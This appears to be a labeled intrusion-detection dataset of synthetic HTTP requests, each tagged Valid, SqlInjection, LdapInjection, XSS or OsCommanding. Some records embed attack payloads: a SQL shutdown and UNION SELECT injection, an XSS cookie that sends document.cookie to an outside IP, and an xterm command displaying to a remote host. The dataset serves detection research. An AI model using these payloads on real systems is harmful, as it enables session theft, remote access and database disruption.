MIME-Version: 5.3
Pragma: b1l8r='n'
Proxy-Authorization: Digest realm
Authorization: Basic eW5zdGlpaDphdHNuZXM=
Range: 41-7,-70107,-4601
Referer: http://www.lead87h.uk/moIt/sthetw/oqdq.pdf
TE: chunked,gzip,chunked;q=0.0
Trailer: Trailer
User-Agent: uhtQCic http://www.w0nt.com
UA-CPU: Sparc
UA-Disp: 3034,654,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4261x691
Via: FTP/9.2 201.154.137.9:8, 2.6 www.0eoot.tiff
Transfer-Encoding: compress
Upgrade: atream/5.4, ueGrn/9.3, 8jitoo/8.1
Warning: 392 www.qhxhGl.png "eSdirkobe" 
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 90040752816
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28166
Start - Id: 38351
class: LdapInjection
GET /sRQZd6b/w@hwHnQLEQP/iwttyiaaneged/fPe5/bchild0q/nullHevalCpxml5ov7izUr/lai/tAWe.css?Cbdsirseali=tr%29%28%7C%288ni%3D*%29&beiEee=0&vxnn=eF9VxdGQcDQI&rst8Gyrue=ed&tftMhryiyawql=90465095&6DFKtQyupdate0=otmh&wIRm=Sltoxz&nkIasmhypalcX=ehs HTTP/1.0
Host: www.inmj.ch
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.4, isiri-3342;q=0.2
Accept-Encoding: deflate, identity, gzip
Accept-Language: i06-scrnGnwg;q=0.4, esiquL-dSlaar, eN-n;q=0.7, eoi-4ik, reA-SirfNoe
Cache-Control: max-stale=0225
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="458"
Date: Tue, 30 Oct 07 06:41:21 GMT
ETag: "eg_Owd@DHvhvOHK"
Expect: imesc=bd5Ni;kahealns=at3ue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Fri, 13 Aug 04 09:31:29 GMT
If-Unmodified-Since: Sat, 13 Jan 07 05:04:28 CET
If-Match: "VyT6hZsPITbAflG"
If-None-Match: "0N3ZjEgKVthq9FB"
If-Range: *
Max-Forwards: 46
MIME-Version: 0.4
Pragma: mh='ttlrewi'
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM ZWVob0VsaHJlQ3JydGVhdW9hbXJpZWlzdHR1OWVzZWFvaW9jZWVlcmNlZmRvbm4=
Range: 0-190754,-136
Referer: /hRret/pjse0ew/hzAb/tcrra2ha/GinLHeo.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: nZu3vo http://www.rece.gov
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8555x781
Via: HTTP/6.0 www.nctttu.html
Transfer-Encoding: gzip
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38351
Start - Id: 35084
class: SqlInjection
GET /oTgmEneerTroyrd/r3aYJ/jPAzP/o-gdUmR/n3Ulsbnseo6A2lky.cgi?aai=3630085184&CdPoY=8ie+tfrrh1rc HTTP/1.0
Host: 17.132.4.42
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.2
Accept-Encoding: '   OR     '7km' <     'X
Accept-Language: T0d7u-j3;q=0.9, he-Xlaouecr;q=0.8
Cache-Control: no-transform
Cookie: cidsROenxspoa=eEbsLgH;itnaoTDnn=neetRc3Afidcew0re;lxloetif=eatnn;NJBMko5=window.openod0r;oSOCRAWY=24
Cookie2: $Version="13"
Date: Fri, 07 Mar 08 22:41:10 CET
ETag: "TnLh_IY@dQjrR1foYxmq"
Expect: 100-continue
From: i7xsde@alroNmEdii.cz
If-Modified-Since: Sun, 25 Oct 09 21:10:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic Y3JybzpldWV1
Authorization: 05vem 6htqr=oraesk
Referer: http://www.oSlltatb.net/dena/nbllefn/njeht.mp3
TE: chunked;q=0.2,chunked;q=0.1,trailers
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 5.1; os-ey; rv:0.4.3) Gecko/52263984
UA-CPU: 68000
Via: 0.2 93.44.244.10, 6.5 www.ste9L.css, 3.6 65.142.5.86
Warning: 805 46.58.201.130 "PnCEsji50oldihgh0oun" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35084
Start - Id: 29348
class: Valid
GET /wj@NJe3qX/nzbpakvB9US2G/dFbodyuTCBEPwMfi/sJk3g/aedxrjltott/rete.cgi? HTTP/1.1
Host: 91.19.42.137:80
Connection: close
Accept: */*
Accept-Charset: windows-1254, utf-8
Accept-Encoding: identity
Accept-Language: kFA-teoadfsN;q=0.2, Obt0Ts-reoadtin, t8Mtanbp-j
Cache-Control: min-fresh=6
Client-ip: 58.32.164.183
Cookie: AIusrhj=thBz7jt;ro=|Met=wp-9cytti[ lnn;vable=-;44eoy7ybjvu2nuw=mths$el hslform he
Cookie2: $Version="038"
Date: Fri, 26 Aug 05 13:39:06 UTC
ETag: "I6lod4.WkBxa_3R"
Expect: 100-continue
From: huEdao@sesefui5t.biz
If-Modified-Since: Mon, 17 Sep 07 19:31:18 GMT
If-Unmodified-Since: Tue, 01 Jul 08 09:05:43 CET
If-Match: *
If-None-Match: "mFXGNLsrU6Xkl2FYkWso"
If-Range: "31Dk3ZMA0-.RAKc6"
Max-Forwards: 505
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="sreeyei"
Authorization: Digest algorithm=MD5
Range: 415-76250
Referer: http://saeonN.st/udidee/sus8oe/1yoaugr/Azeig.asmx
TE: gzip;q=0.5
Trailer: Host
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 4.9; hE-Ei; rv:2.0.2) Gecko/07894840
UA-CPU: PowerPC
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7326x099
Via: HTTP/3.3 www.rz7esf.js, 2.2 www.yOthoic.tiff:0220, 5.7 61.59.172.59
Transfer-Encoding: uambf
Upgrade: eete/7.2
Warning: 540 www.negd.html:77 "yTtl7iqzf" "Mon, 21 Aug 06 08:54:19 UTC"
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 725402
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29348
Start - Id: 42524
class: SqlInjection
GET /J3zbetween2zIb3boe/thnn67rosmofystqEu/gE9vZ1pHgZ3mwSbSvc/DH9acnwn/dP6LeWXa9Gmg8Iv_/e75uW3YH-lwaZhLzpdgP/nteyqrsovrdOtntYw9.bin?2rspresagvn0twg=9840&auTRG=5650596&ljiopNol9stnret=81657115&nIHwhhP5ruu=OR+++++%27Arc%27+++++LIKE+++%27Sim%25%27 HTTP/1.0
Host: 174.171.195.98:80
Connection: keep-alive
Accept: application/x-tar;q=0.8
Accept-Charset: iso-8859-3, x-mac-chinesesimp;q=0.2, iso-8859-8-i, iso-8859-1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 126.1.229.33
Cookie: nhtstaiEtrsalai=sWDx;rylepeena0wt=2034;Ghortbs=e2R
Cookie2: $Version="62"
Date: Tue, 12 Aug 08 18:42:21 GMT
ETag: W/"bdccCy6uK1YsnZ3Ajlk0"
Expect: 100-continue
From: lwelhoow@zyxm39yja.net
If-Modified-Since: Sat, 06 Jun 09 02:07:16 UTC
If-Unmodified-Since: Sat, 06 Sep 08 17:16:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.3
Pragma: 5b=lEen
Proxy-Authorization: NTLM NXRXZGh0ZW81bXNzbm1nYXhudm1UZGR0aWFhZmVmcGV0c2FuZWVLZXJlcnM=
Authorization: Basic Y1h3aDppZHBiemhSOQ==
Range: 430-,2-8084
Referer: http://ash1o.gov/ErcEaoe5/WiersaN/tigh0/ercKspai/4h5Lcu.jsp
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: tEthtV (eup7i1Xm1o)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 7.6 250.255.87.61
Transfer-Encoding: deflate
Upgrade: est/3.4, YhOty/4.0, cy16/8.0, cdtno/6.6
Warning: 039 www.rscr.js "tEodeseiset5e5eLbAid" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 49861
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42524
Start - Id: 16415
class: Valid
GET /ChqmsiKcee4fd8namN/es/OF/iTnmusuxn4mpEdse/b_cbyCinsert@O20pVhome.png?oltsTitFseA=2910311&relspOn=355&b0ij3llbsnwec=7wvzoIXIAOYB&ec=g3bhtpe45%25oisiframel HTTP/1.1
Host: 11.50.213.151:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-9;q=0.6, x-mac-icelandic;q=0.3, iso-2022-kr
Accept-Encoding: 
Accept-Language: oBC-e;q=0.4, 96e8Wrt-naXsyA, ma-s3sfrae;q=0.5
Cache-Control: no-transform
Client-ip: 81.220.56.31
Cookie: GeKe5n8g=strh;99dZx1RdivHK=soopeiwtOico\l~ilra;EMlrwuidrb=lgcseditgp5ia;etn=1394
Cookie2: $Version="11"
Date: Thu, 01 Jan 09 05:44:07 CET
ETag: W/"_smcwUlFm.TISm7S0F"
Expect: 100-continue
From: setosoE@eiteajn.be
If-Modified-Since: Tue, 28 Feb 06 11:52:10 UTC
If-Unmodified-Since: Sun, 04 Oct 09 19:05:26 GMT
If-Match: "v1yudLbNIx@nYsD"
If-None-Match: "IVrEcsNNq7Vj@DiXbU5"
If-Range: Sun, 27 Jun 04 03:11:39 CET
Max-Forwards: 819
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest uri=/isau/hiace.nsf
Authorization: Basic VHNodGJtVHk6eGVudW8=
Range: -1
Referer: http://zaid.de/cfrrien.nsf
TE: deflate;q=0.6,deflate
Trailer: If-Range
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 1.6; s8-2l; rv:3.4.6) Gecko/54524651
UA-CPU: PowerPC
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9846x663
Via: eEop7j/8.8 www.cHnyau8s.jpg, Cetree/7.9 www.lnRen1x.shtml, FTP/7.6 115.69.198.59
Transfer-Encoding: uatf; hinh=oicobk
Upgrade: f0v/2.9, s8dtN/9.2
Warning: 597 131.243.210.234:4 "dcab" 
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 493178
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16415
Start - Id: 35206
class: SqlInjection
GET /3kjLn_/mailw3ZLLy/eEV.MmYwrpjYrX_nxAlK/1WNbyO/hY_v7sjA-7X78GJ.htm?hhsyoneelsecrs=lBamC&kKformU1@3794zu=olinkvlE5nph-%3Dae&oluny5oza=%27%3B+++++shutdown--&medeete=vft&Lpz=980&tnedt=sAtnfthIoe&rdalf4=iiieCt7os&juogRNhttpl8Uboot.ini0a=u2T&n6FS=27057765&telGgrdphrchoi=tj%25uvembr&cee1g3zRdfc6s=1tm%26rv8ols&add6Cqr1=01908 HTTP/1.1
Host: 74.158.139.185
Connection: keep-alive
Accept: application/*;q=0.0, text/html
Accept-Charset: iso-8859-9;q=0.2, iso-2022-jp, windows-1253
Accept-Encoding: compress;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 164.1.23.135
Cookie: gasehuoah=0EsidNAiheoEswieh;tbToeeDdti9l=71723593;sr=u-aLAYf9ZzU7;tmenDnoan=4335
Cookie2: $Version="8"
Date: Wed, 03 Mar 04 19:21:32 GMT
ETag: W/"LM@OO5twrv6vOD3z@"
Expect: 100-continue
From: 1sbtaan@lile.com
If-Modified-Since: Sat, 07 Nov 09 13:51:49 GMT
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "mljvsz-0FOdenSPh"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 667
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: NTLM aHQzaGVudG50NXd1dG10ZXJoc2J6MWlyZWEya2VkeWVudFNqaXRyd2tiZXNz
Range: 786796-,-020
Referer: /oe23sw/eehsmY/aosdc/ordz/vtaeon2.txt
TE: trailers,trailers
Trailer: If-Match
User-Agent: 4dAnEoosereedfniMTz
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: identity
Upgrade: iet/6.8, nt4/7.0, eolcon/0.5, onIars/2.7
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35206
Start - Id: 46678
class: XSS
GET /dU5sJE7XEw.@oZ/tQ87fLgA/oipigahik4t/51o2N22f/m3KQuvAZPPTRjeIE/qra-Cve431h@e/ISj2y/wBL3@Ej4.Z/8triui8t4wqs/067ZASxAvmiW9o/hypny.mEg@41.css? HTTP/1.0
Host: www.ataienfoh.cz:80
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: iso-8859-5;q=0.8, x-mac-japanese, windows-1253;q=0.5, windows-1250;q=0.9, us-ascii;q=0.5
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: max-age=9729
Client-ip: 122.1.27.92
Cookie: 61rutenr=<link     rel  =   "   stylesheet  " href =   "     javascript:[window.open('http://17.255.65.185/inan.nsf'+document.cookie);]    "  >
Cookie2: $Version="94"
Date: Sun, 04 Jul 04 09:09:37 GMT
ETag: "LbLGWBdKI72rB3GO@"
Expect: 2Oine
From: ekionh@nouustph.biz
If-Modified-Since: Mon, 25 May 09 15:24:36 UTC
If-Unmodified-Since: Mon, 02 Jun 08 07:56:31 GMT
If-Match: *
If-None-Match: *
If-Range: "NlMTaOPuCi18rE5lem"
Max-Forwards: 2605
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: 5taRoo rnn5=c3tA9
Authorization: Basic ZUFvdDpvZWxlZGF1dA==
Range: 2194-5461,312-2895
Referer: /Afwteesi.sh
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.0 (compatible; MSIE 8.8; Mac OS X; 4etgeeuelE)
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: gzip
Upgrade: r6rtaz/7.2, e8A/7.2
Warning: 215 182.199.44.60 "ndteejhnqoKy4mea" "Sun, 18 Oct 09 09:17:52 UTC"
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 49725305842038917
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46678
Start - Id: 33876
class: Valid
POST /1_O80Tdv0DNX_Iyk/ih9ef/LptxeIEOq/eOcw7myLnx_p58i8m/rwkqVujPIutQgVlWjx2/.5vAWpM6fyA@cpassthrup.jpg? HTTP/1.1
Content-Length: 328
Content-Language: ecZsn
Content-Encoding: identity
Content-Location: http://www.lUhfa.cz/7Eeg4eji/ooehm50/snidu/0At2sn/I9dr.msf
Content-MD5: dGNjeGR0c2xpaW4za3Rlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Sun, 03 Jun 07 15:17:12 CET
Host: 180.227.76.8:80
Connection: close
Accept: video/mpeg;q=0.2, audio/*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 148.121.124.137
Cookie: iuhhlhxiS=2526;tArhrqE=pYyokZSXnoN
Cookie2: $Version="49"
Date: Mon, 11 Jun 07 08:58:21 UTC
ETag: W/".FCW4_P@QuR9VtiA"
Expect: herbiiTL
From: croyb9et@hoshr.it
If-Modified-Since: Tue, 17 Jan 06 11:35:06 UTC
If-Unmodified-Since: Sat, 13 May 06 11:33:10 CET
If-Match: "p2l89-lm8gKtk4P1rZKG"
If-None-Match: *
If-Range: "ev6xp@7R_MD6tHVp1Y"
Max-Forwards: 64
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="xuyiars"
Authorization: NTLM anluZHR3MGpic3NzOXJOZWRxc2JwcWFpZWVsZUdpc2hlVFlpYWNuYW9pdGJrb2o5
Range: 10-81
Referer: /01piarwd/oolooh/ieysede.php
TE: trailers
Trailer: Range
User-Agent: Mozilla/3.8 (Windows; U; Windows NT 8.5; xt-zu; rv:7.3.2) Gecko/76915116
UA-CPU: x86
UA-Disp: 4768,0511,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 1982x002
Via: 5.0 www.7emH.jpeg, 54de/3.6 www.regyiuii.html:061, 4.8 www.etIe.png:26
Transfer-Encoding: jiodf
Upgrade: 1heem/5.4, eot/5.0, kci2K/9.9, nTh/3.0
Warning: 386 www.tlil.htm "ne3vclsavetwrlareirf" 
X-Forwarded-For: 242.67.177.66
X-Serial-Number: 193442024633174
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

aGcoeooplitprp=12879986&tw=41916&7TfoGXmav4sa=4169364870&r82OccXpoc=nqz&gissmiM4uo=&t&kJwindow.openRqAkxGhb=]p)r<nyc5&ierAa=-positionofoi>cEhhhR&rbetweeni0xp_=io<&Ao=sA9ssseunnAldt &Mwd96tfgs4epM4=48325007&zhleSH1wr=80131274&zTgMw=Lrsrf1bp &g7igOOi93g=iisoeitheqhelc&mnia5=bk]1u+hl8ntn-passwd=oeselectvbscripte

End - Id: 33876
Start - Id: 9837
class: Valid
GET /DiBcopy0MBEimgpSunionG/iYf9PA/0ifcD/S3n0tn/otoallmnyrwoFi/eFhNVF/iHsxb@8rT9k/T5P_system4EOksock_stream9fH/a@GUnrlDKRYWu/tg8-XCh40tvvGAj3mY.asp?top=sr&Emz89xnRskesAm=rztp.t1S&moc5P=mdbgsoundeng%3Fh%3D%26hm%29l&v6eri2s7rd=940379&TnsScecr=aomeg27pteho&aeIenr=z&mc=riln&Rxa5msiUarexDma=36575542 HTTP/1.1
Host: 82.243.236.137
Connection: eoaoi
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: tA-ausa;q=0.5
Cache-Control: max-age=2059
Client-ip: 172.53.112.7
Cookie: tAdhwo=flall7paLu2(g;rdeluyeckaR=>hipndvi2=zo;am=70637;iaeifsctnait=kaCLlRTQ
Cookie2: $Version="34"
Date: Tue, 16 Jun 09 17:06:10 UTC
ETag: "ToKnTU7bGHwMHSKsu"
Expect: Tiedr
From: eiuie74@cpahSn6aa.fr
If-Modified-Since: Thu, 03 Mar 05 01:36:09 GMT
If-Unmodified-Since: Tue, 08 Sep 09 21:10:40 UTC
If-Match: "G_zfNYfzwznCo@fFF"
If-None-Match: "n8O9Wccw2i2wDVY"
If-Range: Fri, 15 Aug 08 08:45:51 UTC
Max-Forwards: 570
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic ZGEyY3JlOmJ3aWgw
Authorization: buh2 eiii=mwc5kif
Range: -820868
Referer: http://e6ittte.it/Tsdjdnu.mpg
TE: chunked,deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.8 (compatible; arlbeao; Linux i386; osgraE3td; faae; eatuo)
UA-CPU: 68000
UA-Disp: 2395,2447,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: FTP/6.0 www.unprhrd.css
Transfer-Encoding: deflate
Upgrade: apYvoi/7.8, geeoh/4.9, eity/4.7, d3ue/6.8
Warning: 359 www.omvimkcn.html "tdHnehjio" 
X-Forwarded-For: 59.15.240.43
X-Serial-Number: 09946739061718
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9837
Start - Id: 25597
class: Valid
GET /iLKuyM9N412HcAmU/x.gH4A/a-DfqmNOz2L8/he5lio/fOHBLswcvvtgQSaH/aEtzltj/utfrntrgpys/xmFhallJqUchomeSXA/tTw/bxm5x27L4tb/lg/Tuufigue1t.asp?uhomBu6c=dhn7t&Ksion4n=6651&losymt=e%3B%3De&xe0m0oincd=n&Re=2629374&havqtjhlrO1eaN=10&f5uhS=ptlimah13eds6ene&LgiWbody1h6KJG=256754&REnpxe=+%401nrl&AzrmM=+nWdjt4H%3Es2 HTTP/1.0
Host: www.dmcdx.st
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.9, deflate, gzip;q=0.9, compress, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 254.210.233.20
Cookie: ctwrj=Etdhe 0e(ywp-Itmpon35;Qlog-Hf=drml-ovv7 f5hbn:i;ytIUwolms5m=48037
Cookie2: $Version="532"
Date: Mon, 10 Nov 08 20:20:38 UTC
ETag: W/"-vFLLiCYGnZ.bQ_2Uxwx"
Expect: 8hyoni4e=ehnweh
From: camaabz@oEUygi.cz
If-Modified-Since: Fri, 03 Aug 07 15:39:31 GMT
If-Unmodified-Since: Tue, 28 Oct 08 01:38:32 CET
If-Match: *
If-None-Match: "wQ_KK6Ql75gjyzOaTT"
If-Range: "R1VFzsbTy3HwH9u5hC"
Max-Forwards: 3
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: Digest cnonce="lat7"
Range: 286-,8185-
Referer: /Htpon/talne1j/fchEw/a3es/lesNu6.bin
TE: chunked,deflate
Trailer: Warning
User-Agent: Mozilla/1.0 (X11; U; Solaris 4.9; ni-li; rv:5.0.3) Gecko/20880471
UA-CPU: PowerPC
UA-Disp: 8439,526,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 290x491
Via: FTP/1.7 www.siefaXs.gif:84412, 9.8 58.91.23.10, 4.3 www.tNlr.shtml
Transfer-Encoding: compress
Upgrade: 1ri/9.8, wbhp/8.4
Warning: 650 136.91.203.255 "ymolni9b19rts" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 10779920705093
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25597
Start - Id: 42460
class: SqlInjection
GET /pWx.3egLu7/dee6efx07eed/oAPsnoeee/eeonoGlihuont/agheE.cgi?0kMhmkyeei=%26e&ieuB=%27+%29+UN%2F**%2FION+++ALL++SEL%2F**%2FECT++++%27fiTu%27%2C9%2C0299%2C%27ot36is%27%2C9+++++FROM+++++tnhaY+++WHERE+++%28%27%27++++%3D++++%27&2tdaG=36259389&unsuta=bygMFwwCNlJu&heDrq=aKoinph-baae&Orntbhijrsn=03&otioruxid=mina HTTP/1.0
Host: www.zleo.net
Connection: close
Accept: application/*;q=0.1
Accept-Charset: iso-8859-2;q=0.6, isiri-3342
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 13.69.56.93
Cookie: 6aeozm=3516643;meueett= AnsAc84N]et tuaet;8SYQFB=ty@HsmEW;GmrnPeea0a=077;Eemaaw5kr4ne=aF4@eMP
Cookie2: $Version="3"
Date: Thu, 22 May 08 06:39:03 UTC
ETag: "qpEgOLwaqcuuIaJS0f8"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Sun, 19 Sep 04 03:50:54 CET
If-Unmodified-Since: Mon, 07 May 07 16:26:46 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 05 May 06 24:47:10 UTC
Max-Forwards: 8530
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aWZ0b3Q6dnJFZW50
Authorization: lnre ewrw8=aEasc
Range: -9
Referer: http://Oamft.it/0esnsa.gif
TE: trailers,gzip,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 2.3; o6-Ei; rv:3.1.0) Gecko/16518551
UA-CPU: 68000
UA-Disp: 3357,1870,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: 8.9 www.laoe8h.png, 9edm5s/5.2 www.atamSak.css
Transfer-Encoding: compress
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42460
Start - Id: 28711
class: Valid
GET /nIB9_/elPcAJgqM/ZilocationevalimgoFW5kr3Z/d5dgseR9h/aFrz31RzmINxMiQTd8d/Htsk/oeafeevmesa/u9BuMI.nsf?r3ln0l=apj&J17eH=nd&Xno=%3Datf8Uuual%29aEiAaeae&uzD6Yw=woKDt3Kx0Wk&n0j=8722295&tqsxrd=ushtd HTTP/1.1
Host: www.Iabedd.org:118
Connection: e01Cdit
Accept: video/quicktime;q=0.3, video/*, application/postscript;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 178.98.193.61
Cookie: olpegx3tEibxu7h=eN.dID5
Cookie2: $Version="0"
Date: Sun, 10 Oct 04 17:28:37 UTC
ETag: W/"6K6gzDu27rPiPu3c6C"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Tue, 15 May 07 23:29:06 CET
If-Unmodified-Since: Fri, 23 Dec 05 03:28:58 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 14 Nov 07 03:06:40 UTC
Max-Forwards: 57
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dmV5bWFocmthRXJ1bnJmdGVzczNzcHJBZnJoZ25kcmN2RTRhNA==
Authorization: NTLM ZmlhdHJpaXNmbWloemxhc3ZhY3JyY25rZWhqYU5odGJ6ZUVJaWNzYQ==
Range: -5
Referer: http://fn7Lunw.ch/enb9r6wO/7pirt95/tenef/eece/ea4ig.exe
TE: deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.9 (compatible; MSIE 3.6; Win 9x; Tuooro)
UA-CPU: 68000
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 0.8 www.ntteg.gif, 5.8 www.lebuoR6t.shtml:18457, 3.9 www.ebiih.png
Transfer-Encoding: deflate
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 669 www.arAn.jpg "e3btqt7scal3asb" "Tue, 04 Nov 08 19:20:43 GMT"
X-Forwarded-For: 3.37.115.146
X-Serial-Number: 244229732731
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28711
Start - Id: 36792
class: OsCommanding
GET /nrubEf/tht/iCCQEtZjSPQ/ae6eehozE7Inlepray/1ZJcJI6qVc/naombtr2nMtln/wk@.js?19neADCje=ienetcatr%2B%3Bidi%2Bzreplace7&vMD0wXuG=sYb&8Fcmsye=8188583&TeHzY.7optwOW=%250A+++xterm+++-display++www.rier.com%3A0.0+&yxs=%3E%40%3F8Eut&elEytrAcoe=csadlib%5DI+onglocation&nsdyiir3mhe=4Nd&hEeia=2yY-&ysrTcua7r7e=ihpositionie%2B&us=78785837 HTTP/1.0
Host: www.4qfzz.org
Connection: close
Accept: audio/*, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: run2N-etoiri;q=0.0, cuqtc9-ccH1eet
Cache-Control: no-transform
Client-ip: 90.167.86.81
Cookie: te= 1]tnmgu;neswb=snz;tv7cnspoer4tubn=8925053952
Cookie2: $Version="1"
Date: Sun, 22 Jan 06 15:24:28 GMT
ETag: W/"uKfu1TRU1jd_iSaAh"
Expect: sid9n=eluiuds;m3ishri=rjmr
From: wsCala@r0ragpmo.de
If-Modified-Since: Mon, 18 Dec 06 09:16:56 CET
If-Unmodified-Since: Wed, 30 May 07 03:56:45 GMT
If-Match: *
If-None-Match: *
If-Range: "4k3HD7n.qUbdpFqx-f"
Max-Forwards: 774
MIME-Version: 1.1
Pragma: reuo5gst='pl'
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: Digest realm
Range: 907-5,-807
Referer: http://h1arui.st/amoR/es7s/eoc8/Twdt/eaf3f.nsf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.5 (X11; U; Linux i586 7.5; s2-mm; rv:1.2.3) Gecko/98219831
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
